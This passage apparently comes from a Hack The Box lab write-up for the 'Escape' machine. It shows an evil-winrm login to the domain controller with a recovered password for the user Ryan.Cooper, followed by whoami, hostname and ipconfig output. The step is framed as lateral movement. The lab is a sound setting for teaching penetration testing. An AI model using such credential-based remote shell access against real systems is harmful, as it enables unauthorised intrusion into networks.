Ryan.Cooper
With the validated credential for the Ryan.Cooper user, I can establish a PowerShell session using evil-winrm
┌──(kali㉿kali)-[~/archive/htb/labs/escape]
└─$ evil-winrm -i $IP -u Ryan.Cooper -p 'NuclearMosquito3'
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*evil-winrm* ps c:\Users\Ryan.Cooper\Documents> hostname
dc
*evil-winrm* ps c:\Users\Ryan.Cooper\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::21c
ipv6 address. . . . . . . . . . . : dead:beef::31e1:eb54:2784:d5cd
link-local ipv6 address . . . . . : fe80::31e1:eb54:2784:d5cd%4
ipv4 address. . . . . . . . . . . : 10.10.11.202
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%4
10.10.10.2
```
Lateral Movement made to the `ryan.cooper` user via WinRM